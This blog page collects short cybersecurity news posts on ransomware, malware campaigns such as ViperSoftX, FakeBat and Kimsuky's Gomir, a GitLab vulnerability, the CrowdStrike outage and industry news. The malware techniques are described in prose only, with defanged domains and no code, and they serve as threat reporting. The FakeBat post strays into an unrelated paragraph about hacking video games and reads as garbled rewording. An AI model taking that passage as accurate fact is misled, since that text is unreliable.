Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Software. Show all posts
Software
Cyber Attacks Cyber Victim CyberCrime Cybersecurity CyberThreat Ransomware Threat Software

California's Major Trial Court Falls Victim to Ransomware Attack

 


It has been reported that the computer system at the largest trial court in this country has been infected by ransomware, causing the system to crash. Superior Court officials said they were investigating the incident. As soon as the court learned that the computer network systems had been hacked, the systems were disabled, and they are expected to remain down until the weekend at the very least. 

Following the statement, a preliminary investigation revealed no evidence that the user's data had been compromised in any way. According to officials with the Superior Court of Los Angeles County, the nation's largest trial court was closed Monday as a ransomware attack shut down its computer system late last week, resulting in a shutdown of its library and many other departments. 

As soon as the court became aware of the cyberattack early Friday morning, its computer network was disabled, and the system remained offline throughout the weekend due to the attack. There will be no courthouse operations on Monday, despite reports that the county's 36 courthouses will all remain open to the public on Friday. According to a statement released by the FBI on Friday morning, officials do not believe the cyberattack related to the faulty CrowdStrike software update that has disrupted airlines, hospitals, and governments worldwide is related to the security breach. 

Once the court was made aware of the attack, all computer systems connected to its computer network were disabled. An initial investigation has revealed no evidence that the data of users has been compromised, according to the statement released by the company. KCAL, the CNN affiliate based in Los Angeles, reported Monday that the judicial system continues to be closed as it tries to recover. 

As the largest court system in the United States that serves a broad range of services to more than 10 million residents in 36 courthouses, the Superior Court of Los Angeles County is the largest unified court system in the country. The number of cases filed in 2022 is expected to reach nearly 1.2 million, and there will be almost 2,200 jury trials. According to the Presiding Judge Samantha P. Jessner, "The Court has been experiencing a cyber-attack which has resulted in almost all of our network systems being shut down. 

Companies have contained the damage to their network, ensured data integrity and confidentiality, and ensured future network stability and security" during an unprecedented cyber-attack on Friday. The court has reopened all 36 courthouses tomorrow, July 23, following the tireless dedication of the staff and security experts required to assist in restoring the court to full operation," according to a statement published on the court's website. Court users need to be aware that there will be delays and potential impacts due to limitations in functionality.
Read more »
Software
CrowdStrike Cyber Security Global Airlines IT system Microsoft 365 Software

Global IT Outage Disrupts Airlines, Hospitals, and Financial Institutions

 



A major IT outage has affected a wide array of global institutions, including hospitals, major banks, media outlets, and airlines. The disruption has hindered their ability to offer services, causing widespread inconvenience and operational challenges.

International airports across India, Hong Kong, the UK, and the US have reported significant issues, with numerous airlines grounding flights and experiencing delays. In the US, major airlines such as United, Delta, and American Airlines implemented a "global ground stop" on all flights, while Australian carriers Virgin and Jetstar faced delays and cancellations. According to aviation analytics firm Cirium, over 1,000 flights worldwide have been cancelled due to the outages.

At Indira Gandhi International Airport in Delhi, passengers experienced "absolute chaos," with manual processes replacing automated systems. Similar situations were reported in airports in Tokyo, Berlin, Prague, and Zurich, where operations were significantly hampered.

Emergency services and hospitals have also been severely impacted. In the US state of Alaska, officials warned that the 911 system might be unavailable, and some hospitals have had to cancel surgeries. In Australia, however, authorities confirmed that triple-0 call centres were unaffected.

Hospitals in Germany and Israel reported service disruptions, while GP services in the UK were also affected. These interruptions have raised concerns about the ability of medical facilities to provide timely care.

The media sector did not escape the impact, with many broadcast networks in Australia experiencing on-air difficulties. Sky News UK went off air for a period but has since resumed broadcasting. Retail operations were also disrupted, with supermarkets like Coles in Australia facing payment system failures, forcing the closure of self-checkout tills.

Cybersecurity firm CrowdStrike has confirmed that a defective software update for its Microsoft Windows hosts caused the outage. In a statement, CrowdStrike assured that the issue had been identified, isolated, and a fix deployed, emphasising that the incident was not a cyberattack. They advised organisations to communicate with CrowdStrike representatives through official channels to ensure proper coordination.

Earlier in the day, a Microsoft 365 service update had noted an issue impacting users' ability to access various Microsoft 365 apps and services. Microsoft later reported that most services were restored within a few hours.

The outage has highlighted the vulnerabilities of global IT systems and the widespread reliance on third-party software. A spokesperson for Australia's home affairs ministry attributed the issues to a technical problem with a third-party software platform used by the affected companies. The country's cybersecurity watchdog confirmed that there was no evidence of a malicious attack.

As companies scramble to resolve the issues, the incident serves as a stark reminder of the critical need for robust IT infrastructure and effective crisis management strategies. The global scale of the disruption underscores the interconnected nature of modern technology and the potential for widespread impact when systems fail.

This incident will likely prompt a reevaluation of cybersecurity measures and disaster recovery plans across various sectors, emphasising the importance of resilience and preparedness in the digital age.


Read more »
Software
ebooks Encryption malware PDF PowerShell Software

Improved ViperSoftX Malware Distributed Through eBooks

 



Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%MicrosoftWindows directory, renaming them to .au3 and AutoIt3.exe.

A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.

Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


Read more »
Technology
CyberCrime Cyberhackers CyberThreat Fake-Bat Loaders Software Technology

Exploring Fake-Bat Loaders: Distribution Tactics and Cybercrime Networks

 


There has been a significant increase in the number of threats exploiting the drive-by-download method during the first half of 2024, such as the FakeBat loader, formerly EugenLoader or PaykLoader. There has been an increasing emphasis on using this method in the past few years by cyber criminals to spread malware by infecting unsuspecting users while browsing the web. 

A drive-by download is a technique that uses tricks like SEO poisoning, malvertising, and injecting malicious code on websites that have been compromised to promote the download. By using these methods, users are tricked into downloading fake software or updates. As a result, they unwittingly install malware like loaders (such as FakeBat, BatLoader), botnets (such as IcedID, PikaBot) and others. As of right now, video games are usually RPGs (role-playing games) in which players get to immerse themselves in stories or adventure-based adventure games where they take part in some sort of combat. 

It is worth noting, however, that there's a fascinating niche of games that focus on hacking and cybersecurity. These video games allow players to embody the role of hackers, as they simulate hacking and coding terms. There will be a variety of hacking activities that players can get involved in, ranging from breaking into secure networks to creating complex scripts, all while navigating different scenarios and objectives throughout the game. As a result of drive-by-downloads, cybercriminals have been increasingly making use of these methods to upload malware to users' computers via their browsers during recent years. 

To use this technique, you will generally have to poison search engine results, run malicious ads, and inject code into compromised websites to trick users into downloading fake software installers or browser updates that are harmful to their computers. The drive-by download technique is commonly used by multiple intrusion sets to distribute loaders (such as FakeBat, BatLoader), botnets (such as IcedID, PikaBot), information stealers (such as Vidar, Lumma, Redline), post-exploitation frameworks (such as CobaltStrike, Sliver) and reconnaissance systems (such as NetSupport), among many others.

Based on some observations, some of these attacks have been conducted by Initial Access Brokers (IABs) that have resulted in the deployment of ransomware (BlackCat, Royal) in several networks. In the early part of 2024, one of the most popular drive-by-download loaders used to load files was FakeBat (also known as EugenLoader, PaykLoader) which was one of the most widely used loaders. There are many threats out there, including fake bats that are designed to download and execute payloads in a later stage, such as IcedID, Lumma, Redline, SmokeLoader, SectopRAT, and Ursnif. Sekoia Threat Detection & Research (TDR) team was able to discover numerous campaigns distributing FakeBats in 2024 due to its ongoing research. 

Malvertising campaigns are commonly used in these campaigns because they employ landing pages that impersonate legitimate software. They engage in bad-faith web browser updates on compromised websites as well as social engineering schemes through social networking sites. The TDR team kept a close eye on the FakeBat C2 infrastructure to know when new C2 servers were being added and when operations within FakeBat were changing. There is a specific purpose of this FLINT which is to present the activities of the FakeBat operators on cybercrime forums, to analyze campaigns that distributed FakeBat in previously undocumented ways, to provide technical details regarding its distribution campaigns, and to describe its related C2 infrastructure. 

The TDR analysts also share several indicators of compromise (IoCs), YARA rules, as well as heuristics that can be used to detect and track FakeBat distribution and C2 infrastructures to monitor them. On the Exploit forum, Eugenfest (aka Payk_34), a threat actor that has been selling Loader-as-a-Service under the guise of FakeBat, has been selling it at least since December 2022. According to the company's representative, FakeBat comes in the form of a loader malware packaged in MSI format, which is advertised as having "several anti-detection features, such as bypassing Google's Unwanted Software Policy and Windows Defender's alerts and being protected from VirusTotal detection". 

 In recent developments, the Malware-as-a-Service (MaaS) known as FakeBat has emerged as a notable threat, providing tools to Trojanize legitimate software. This tactic aims to deceive potential victims into unwittingly executing the malicious code. The operational framework of FakeBat includes an administration panel equipped with detailed information about infected hosts, encompassing IP addresses, geographic locations, operating systems, web browsers, simulated software identities, and installation statuses. 

Notably, clients utilizing FakeBat can append comments to each bot entry, enhancing management and operational insights. September 2023 marked a significant expansion for FakeBat operators, who launched an aggressive advertising campaign across cybercrime forums and Telegram channels. This initiative introduced MSIX as a novel format for deploying malware builds. Additionally, to circumvent Microsoft SmartScreen security protocols, the operators began embedding a digital signature within the FakeBat installer, backed by a legitimate certificate. This signature is featured prominently in the MSIX format and is optionally available for MSI formats, bolstering the malware's perceived legitimacy and evasive capabilities. 

FakeBat maintains its leadership position in 2024 by employing a diverse array of distribution methods. These include masquerading as legitimate software sites and compromising web domains by injecting malicious code. Notably, cybersecurity firm Sekoia has identified several domains associated with FakeBat's command-and-control (C2) infrastructure, such as 0212top[.]online, 3010cars[.]top, and 756-ads-info[.]site. These domains are frequently registered under obscured or misleading ownership details, underscoring FakeBat's adaptability and the evolving landscape of cyber threats. The malware employs deceptive strategies to proliferate, such as fake software update campaigns. 

Sekoia's investigations have uncovered instances where FakeBat mimicked updates for popular applications like AnyDesk and Google Chrome. Users are led to download malware under the guise of legitimate updates, illustrating the loader's sophisticated methods of system infiltration. Furthermore, FakeBat is recognized for its proficiency in drive-by download attacks, leveraging these tactics to evade detection and exploit system vulnerabilities effectively. In conclusion, FakeBat's expansive distribution strategies and continual evolution highlight its prominence in the realm of cybercrime, underscoring the persistent challenges faced by cybersecurity professionals in combating such threats.
Read more »
Vulnerabilities and Exploits
Data Leak GitLab Malicous Code Software Vulnerabilities and Exploits

Pipeline Hijacking: GitLab’s Security Wake-Up Call

Pipeline Hijacking: GitLab’s Security Wake-Up Call

A major vulnerability exists in some versions of GitLab Community and Enterprise Edition products, which might be exploited to run pipelines as any user.

GitLab is a prominent web-based open-source software project management and task tracking tool. There are an estimated one million active license users.

Understanding the Critical GitLab Vulnerability: CVE-2024-5655

The security problem resolved in the most recent update is identified as CVE-2024-5655 and has a severity level of 9.6 out of 10. Under some conditions, which the vendor did not specify, an attacker might exploit it to execute a pipeline as another user.

GitLab pipelines are a component of the Continuous Integration/Continuous Deployment (CI/CD) system that allows users to build, test, and deploy code changes by running processes and tasks automatically, either in parallel or sequentially.

The vulnerability affects all GitLab CE/EE versions, including 15.8 through 16.11.4, 17.0.0 to 17.0.2, and 17.1.0 to 17.1.0.

GitLab has resolved the vulnerability by releasing versions 17.1.1, 17.0.3, and 16.11.5, and users are encouraged to install the patches as soon as possible.

What Is CVE-2024-5655?

The vulnerability allows an attacker to trigger a pipeline as any user within the GitLab environment. In other words, an unauthorized individual can execute code within a project’s pipeline, even if they don’t have the necessary permissions. This could lead to several serious consequences:

Unauthorized Access to Sensitive Code: An attacker gains access to private repositories and sensitive code by exploiting this vulnerability. This compromises the confidentiality of intellectual property, proprietary algorithms, and other valuable assets stored in GitLab.

Data Leakage: The ability to run pipelines as any user means that an attacker can potentially leak data, including credentials, API keys, and configuration files. This information leakage could have severe implications for an organization’s security posture.

Malicious Code Execution: An attacker could inject malicious code into pipelines, leading to unintended actions. For instance, they might introduce backdoors, modify code, or execute arbitrary commands.

Affected Versions

The vulnerability impacts specific versions of GitLab:

  • GitLab versions starting from 15.8 prior to 16.11.5
  • GitLab versions starting from 17.0 prior to 17.0.3
  • GitLab versions starting from 17.1 prior to 17.1.1

Gitlab’s response 

GitLab promptly addressed this issue by releasing updates that fix the vulnerability:

Upgrade GitLab: Update your GitLab installation to a patched version. GitLab has provided patches for the affected releases, so ensure you apply them promptly.

Review Permissions: Audit user permissions within your GitLab projects. Limit pipeline execution rights to authorized users only.

Monitor Pipelines: Keep an eye on pipeline activity. Unusual or unexpected pipeline runs should be investigated promptly.

Read more »
Windows
HTML malware Protocols Search Software Windows

New Malware Campaign Exploits Windows Search to Spread

 



A new and intricate alware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.


HTML Attachment Mechanics

Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh"` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.


Exploitation of the Search Protocol

When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.


Execution of Malicious Files

After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.

To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.

This attack surfaces the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


Read more »
Software
Apple Apple MacOS cryptocurrency malware Software

New MacOS Malware Steals Browser Data and Cryptocurrency

 



While malware attacks on Windows and Android systems are more frequent, macOS is not immune to such dangers. Cybersecurity experts at Moonlock Lab have identified a new type of macOS malware that adeptly avoids detection and poses a serious threat to user data and cryptocurrency.


How the Malware Spreads

The infection starts when users visit websites that offer pirated software. On these sites, they might download a file called CleanMyMacCrack.dmg, thinking it’s a cracked version of the CleanMyMac utility. However, launching this DMG file triggers a Mach-O executable, which then downloads an AppleScript. This script is specifically designed to steal sensitive information from the infected Mac.


Malware Capabilities

Once the malware infiltrates a macOS system, it can carry out a range of malicious activities:

  • It captures and stores the Mac user's username.
  •  The malware sets up temporary directories to store stolen information temporarily.
  •  It retrieves browsing history, cookies, saved passwords, and other data from different web browsers.
  •  The malware identifies and accesses directories containing cryptocurrency wallets.
  •  It copies data from the macOS keychain, Apple Notes, and Safari cookies.
  •  It gathers general user information, system specifications, and metadata.
  •  All the collected data is eventually exfiltrated to the attackers.


Link to a Known Hacker

Moonlock Lab has traced this macOS malware back to a notorious Russian-speaking hacker known as Rodrigo4. This individual has been seen on the XSS underground forum, where he is actively seeking collaborators to help spread his malware through search engine optimization (SEO) manipulation and online advertisements.

Rodrigo4's method involves manipulating search engine results and placing ads to lure unsuspecting users into downloading the malicious software. By making the malware appear as a popular utility, he increases the chances of users downloading and installing it, unknowingly compromising their systems.


How to Protect Yourself

To prevent this malware from infecting your Mac, Moonlock Lab recommends several precautions:

1. Only download software from reputable and trusted sources.

2. Regularly update your operating system and all installed applications.

3. Use reliable security software to detect and block malware.

The crucial point is users should be cautious about downloading software from unverified websites and avoid using pirated software, as these are common vectors for malware distribution. Staying informed about the latest cybersecurity threats and adopting good digital hygiene practices can also drastically reduce the risk of infection.




Read more »
Software Issues
CVEs Cyber Security Data Data Safety data security Safety Software Software Issues

Why CVEs Reflect an Incentives Problem

 

Two decades ago, economist Steven Levitt and New York Times reporter Stephen Dubner published "Freakonomics," a book that applied economic principles to various social phenomena. They argued that understanding how people make decisions requires examining the incentives they respond to. Using a range of sociological examples, they demonstrated how incentives can lead to unexpected and sometimes counterproductive outcomes.

Reflecting on these unintended consequences brings to mind a growing issue in cybersecurity: the rapid increase in software vulnerabilities tracked as Common Vulnerabilities and Exposures (CVEs). Last year, a record 28,902 CVEs were published, averaging nearly 80 vulnerabilities per day—a 15% rise from 2022. 

These software flaws are costly, with two-thirds of security organizations reporting an average backlog of over 100,000 vulnerabilities and patching fewer than half. The surge in CVEs is partly because we’ve improved at discovering vulnerabilities, and partly due to inadequate safeguards in the creation and tracking mechanisms for CVEs. It’s crucial to consider the incentive structure that motivates the identification and assignment of vulnerabilities.

While the system for assigning and scoring CVEs is widely used, it has significant flaws. Established by MITRE in 1999, the CVE system provides a standardized method for identifying and cataloguing software vulnerabilities, helping organizations prioritize and mitigate them. However, the incentive mechanisms behind CVE assignment and scoring present challenges that can undermine this system’s effectiveness.

Some security researchers seek a reputation within the cybersecurity community by gaming the CVE system. This drive for recognition or professional advancement can result in a focus on the quantity over quality of submissions, cluttering the system with trivial or noncritical issues and diverting attention from more severe vulnerabilities. The ability to file CVEs anonymously or with minimal evidence also introduces opacity, allowing for erroneous, exaggerated, or malicious submissions. This lack of accountability necessitates rigorous verification processes to maintain trust in the system.

The Common Vulnerability Scoring System (CVSS) has been criticized for not accurately reflecting the actual risk posed by vulnerabilities in real-world environments. High-scoring vulnerabilities may receive undue attention, while more critical, exploitable flaws in specific contexts are deprioritized. For instance, security researcher Dan Lorenc highlighted a day when 138 CVEs were published, two with a critical priority score of 9.8, but none were true vulnerabilities. This raises the question: Are we seeing more CVEs because there are more vulnerabilities, or because the rewards for reporting them have increased?

To address these issues, we need to rethink the incentive structure of CVE reporting. Here are some suggestions:

1. Reward quality over quantity: Implement rewards based on the quality and impact of reported vulnerabilities, encouraging researchers to focus on significant exploits rather than sheer numbers.

2. Enhance verification and accountability: Introduce a tiered verification process requiring substantial proof of a vulnerability’s existence and impact before assigning a CVE, while still protecting researchers' identities.

3. Redefine CVSS to reflect real-world risk: Revamp the CVSS to better indicate real-world risk and exploitability, possibly incorporating feedback from organizations that have experienced exploit attempts.

Incentives play a crucial role in motivating the discovery and disclosure of vulnerabilities. To address the current issues in CVE reporting, we must reconsider how incentives shape behaviour. Until then, we can expect another record-breaking year for CVEs.
Read more »
XDR Firm
CISO Cyber Security IBM Palo Alto Networks Software XDR Firm

IBM's Exit from Cybersecurity Software Shakes the Industry


 

In an unexpected move that has disrupted the cybersecurity equilibrium, IBM has announced its exit from the cybersecurity software market by selling its QRadar SaaS portfolio to Palo Alto Networks. This development has left many Chief Information Security Officers (CISOs) rethinking their procurement strategies and vendor relationships as they work to rebuild their Security Operations Centers (SOCs).

IBM's QRadar Suite: A Brief Overview

The QRadar Suite, rolled out by IBM in 2023, included a comprehensive set of cloud-native security tools such as endpoint detection and response (EDR), extended detection and response (XDR), managed detection and response (MDR), and key components for log management, including security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms. The suite was recently expanded to include on-premises versions based on Red Hat OpenShift, with plans for integrating AI capabilities through IBM's Watsonx AI platform.

The agreement, expected to close by the end of September, also designates IBM Consulting as a "preferred managed security services provider (MSSP)" for Palo Alto Networks customers. This partnership will see the two companies sharing a joint SOC, potentially benefiting customers looking for integrated security solutions.

Palo Alto Networks has assured that feature updates and critical fixes will continue for on-premises QRadar installations. However, the long-term support for these on-premises solutions remains uncertain.

Customer Impact and Reactions

The sudden divestiture has taken the cybersecurity community by surprise, particularly given IBM's significant investment in transforming QRadar into a cloud-native platform. Eric Parizo, managing principal analyst at Omdia, noted the unexpected nature of this move, highlighting the substantial resources IBM had dedicated to QRadar's development.

Customers now face a critical decision: migrate to Palo Alto's Cortex XSIAM platform or explore other alternatives. Omdia's research indicates that IBM's QRadar was the third-largest next-generation SIEM provider, trailing only Microsoft and Splunk (now part of Cisco). The sudden shift has left many customers seeking clarity and solutions.

Market Dynamics

This acquisition comes at a pivotal time in the cybersecurity industry, with SIEM, SOAR, and XDR technologies increasingly converging into unified SOC platforms. Major players like AWS, Microsoft, Google, CrowdStrike, Cisco, and Palo Alto Networks are leading this trend. Just before IBM's announcement, Exabeam and LogRhythm revealed their merger plans, aiming to combine their SIEM and user and entity behaviour analytics (UEBA) capabilities.

Forrester principal analyst Allie Mellen pointed out that IBM's QRadar lacked a fully-fledged XDR offering, focusing more on EDR. This gap might have influenced IBM's decision to divest QRadar.

For Palo Alto Networks, acquiring QRadar represents a significant boost. The company plans to integrate QRadar's capabilities with its Cortex XSIAM platform, known for its automation and MDR features. While Palo Alto Networks has made rapid advancements with Cortex XSIAM, analysts like Parizo believe it still lacks the maturity and robustness of IBM's QRadar.

Palo Alto Networks intends to offer free migration paths to its Cortex XSIAM for existing QRadar SaaS customers, with IBM providing over 1,000 security consultants to assist with the transition. This free migration option will also extend to "qualified" on-premises QRadar customers.

The long-term prospects for QRadar SaaS under Palo Alto Networks remain unclear. Analysts suggest that the acquisition aims to capture QRadar's customer base rather than sustain the product. As contractual obligations expire, customers will likely need to transition to Cortex XSIAM or consider alternative vendors.

A notable aspect of the agreement is the incorporation of IBM's Watsonx AI into Cortex XSIAM, which will enhance its Precision AI tools. Gartner's Avivah Litan highlighted IBM's strong AI capabilities, suggesting that this partnership could benefit both companies.

In conclusion, IBM's exit from the cybersecurity software market marks a paradigm shift, prompting customers to reevaluate their security strategies. As Palo Alto Networks integrates QRadar into its offerings, the industry will closely watch how this transition unfolds and its impact.




Read more »
Symantec
Cyber Attacks Cyberhacking Hacker attack Hacker group Kimsuky Linux Malware Malware Trojan North Korea Hackers Software Symantec

North Korean Hacker Group Kimsuky Deploys New Linux Malware 'Gomir' via Trojanized Software Installers

 

North Korean hacker group Kimsuky has unveiled a new Linux malware named "Gomir," a variant of the GoBear backdoor. This development marks a significant advancement in the group's cyber espionage tactics. Kimsuky, linked to North Korea’s military intelligence, the Reconnaissance General Bureau (RGB), has a history of sophisticated cyber attacks aimed primarily at South Korean entities. 

In early February 2024, researchers at SW2, a threat intelligence company, reported a campaign by Kimsuky involving trojanized versions of various software solutions. These included TrustPKI and NX_PRNMAN from SGA Solutions and Wizvera VeraPort. The primary targets were South Korean entities, and the malicious software delivered the Troll Stealer and Go-based Windows malware known as GoBear. 

Further investigation by Symantec, a Broadcom company, revealed that the same campaign also deployed a Linux variant of the GoBear backdoor, dubbed "Gomir." This new malware shares many similarities with its Windows counterpart, featuring direct command and control (C2) communication, persistence mechanisms, and support for executing a wide range of commands. Upon installation, Gomir checks the group ID value to determine if it runs with root privileges on the Linux machine. 

It then copies itself to /var/log/syslogd for persistence, creates a systemd service named ‘syslogd,’ and issues commands to start the service. Following these steps, the original executable is deleted, and the initial process is terminated. To ensure it runs on system reboot, the backdoor attempts to configure a crontab command by creating a helper file ('cron.txt') in the current working directory. If successful, the helper file is removed. Gomir supports 17 operations triggered by commands received from the C2 via HTTP POST requests. 

These operations include pausing communication with the C2 server, executing arbitrary shell commands, reporting the current working directory, probing network endpoints, and more. Notably, these commands are almost identical to those supported by the GoBear Windows backdoor, highlighting the malware's versatility and Kimsuky's ability to adapt its tools across different operating systems. Symantec researchers have pointed out that supply-chain attacks, such as trojanized software installers and fake installers, are a preferred attack method for North Korean espionage actors. 

The choice of software for trojanization seems to be carefully selected to maximize infection rates among South Korean targets. By compromising widely used software solutions, Kimsuky increases its chances of infiltrating targeted systems and exfiltrating valuable data. The implications of Kimsuky's activities are significant. By enhancing their malware capabilities and expanding their target range to include Linux systems, Kimsuky poses a heightened threat to organizations, particularly those in South Korea. 

The use of advanced malware like Gomir demonstrates the group's continuous evolution and sophistication in cyber espionage. Symantec's report on this campaign includes a set of indicators of compromise (IOCs) for multiple malicious tools observed, including Gomir, Troll Stealer, and the GoBear dropper. These IOCs are crucial for cybersecurity professionals to detect and mitigate the impact of these threats. 

As the digital landscape continues to evolve, the need for robust cybersecurity measures becomes ever more critical. Organizations, especially those in high-target regions like South Korea, must remain vigilant and proactive in their defense strategies. This includes regularly updating software, conducting thorough security assessments, and implementing comprehensive threat detection and response mechanisms. 

The emergence of Gomir and similar threats underscores the importance of international cooperation in combating cybercrime. By sharing intelligence and collaborating on cybersecurity initiatives, nations can better protect their critical infrastructure and sensitive data from sophisticated threat actors like Kimsuky.
Read more »
VPN
Cookies Cyber Threats phishing Privacy Software VPN

Here’s Why You Shouldn’t Trust VPNs Blindly


 

In an era where we should be gravely concerned about online privacy and security, Virtual Private Networks (VPNs) have come through as indispensable tools for safeguarding digital identities. However, amidst the buzz of VPN advertisements promising invincibility against cyber threats, it's crucial to peel back the layers of misinformation and understand the realities of VPN capabilities.

A VPN, short for Virtual Private Network, encrypts internet traffic, creating a secure tunnel for data transmission. By masking users' IP addresses and their locations, VPNs offer concentrated anonymity and access to geo-restricted content. While these features provide a layer of protection, it's essential to acknowledge the limitations inherent in VPN technology.

Social Media Risks

Despite VPN encryption, personal information voluntarily shared on social media platforms remains vulnerable. From name and email address to posts and shares, users expose sensitive data, susceptible to exploitation by malicious actors. Enabling users to review privacy settings and exercise caution in sharing personal information is paramount in mitigating social media risks.

Phishing Scams

Phishing, a prevalent form of online scam, exploits human vulnerability rather than technical weaknesses. While VPNs can deter interception of internet traffic, they cannot thwart users from falling victim to phishing schemes. Combating phishing necessitates user education on identifying suspicious messages and exercising caution while sharing sensitive information online.

Harmful Software 

While some VPNs offer malware-blocking features, they are not comprehensive antivirus solutions. Collaborating VPNs with robust antivirus software enhances defence mechanisms against malware and viruses. Being careful while selecting reputable VPN providers and deploying supplementary security measures is imperative in maintaining your digital resilience.

Tracking Cookies Intrusions 

VPNs mitigate anonymity risks at the network level but fall short in combating tracking cookies embedded in web browsers. Regularly clearing cookies on devices mitigates privacy intrusions, albeit at the expense of convenience. Balancing privacy concerns with usability demonstrates the challenging endeavour in exploring the digital world safely. 

Online Accounts Digital Footprints 

Despite VPN usage, online activities remain traceable, particularly within centralised platforms like Google. Logging out from accounts during sensitive transactions and diversifying usage of privacy-focused services minimise digital footprints. Embracing alternative platforms prioritising user privacy essentially presents a paradigm shift towards decentralised digital ecosystems.

VPNs serve as go-to tools for navigating online privacy and security. However, they are not reliable for all digital threats. We need to get a hold of VPN limitations and empower users to adopt a multifaceted approach to digital defence, integrating VPNs with supplementary security measures and prudent online practices.

By synthesising expert insights and user-centric perspectives, it's evident that coursing through the VPNs requires a nuanced understanding of both its offerings and constraints. 


Read more »
TCS
AI Revolution BPO Call Center Cyber Attacks CyberCrime Cybersecurity IT Systems Policymakers Software TCS

TCS CEO Predicts AI Revolution to Decimate India's Call Center Industry in Just One Year

 


As early as next year, Tata Consultancy Services' head said, artificial intelligence will generate a "minimal" need for call centres, as AI's rapid advancements to date are set to disrupt a vast industry across Asia and beyond. AI's rapid advancements are expected to result in the demise of vast call centres across the globe. 

The chief executive of TCS, K Krithivasan, told the Financial Times that although he had not seen any job reductions at the company so far, the wider adoption of generative artificial intelligence by multinational clients will transform the kinds of customer support centres that have created a lot of jobs in countries like India and the Philippines because of the massive growth in customer service. 

The author believes that chatbots equipped with generative artificial intelligence will be capable of analysing customer transaction histories as well as performing tasks traditionally handled by call centre agents. As a result of the possibility that generative AI might negatively affect white-collar jobs, such as call centre employees and software developers, policymakers around the globe have expressed concern. 

In the $48.9 billion IT and business process outsourcing industry that accounts for over five million jobs in India according to Nasscom, this is a significant threat to the country, which is known for its back-office services. It has been highlighted once again in the comments of the TCS CEO that AI is likely to take over many jobs, including call centre agents and software developers in the future.

The remarks of the TCS CEO are very important for India, which, according to Nasscome, employs over five million people in IT and BPO processes. In his opinion, AI will have a far greater impact on society than has been anticipated in the short term, even though there have been exaggerated expectations regarding its immediate effects. 

The chairman also mentioned that a growing need for individuals with technological skills will be observed in the coming years. Among the more than 600,000 employees of TCS, an arm of India’s Tata conglomerate, which develops IT systems for multinational companies, the company generates revenues of more than $30 billion annually. 

The flow is expected to be "significantly increased" and will almost double over a few more quarters, according to Krithivasan. To date, the company has been able to pay off its investment by selling a record number of orders worth $42.7 billion for the financial year that ends in March. Due to factors such as inflation, geopolitical tensions, and past elections, Krithivasan explained that previously, IT services spending had been clouded with "uncertainty." 

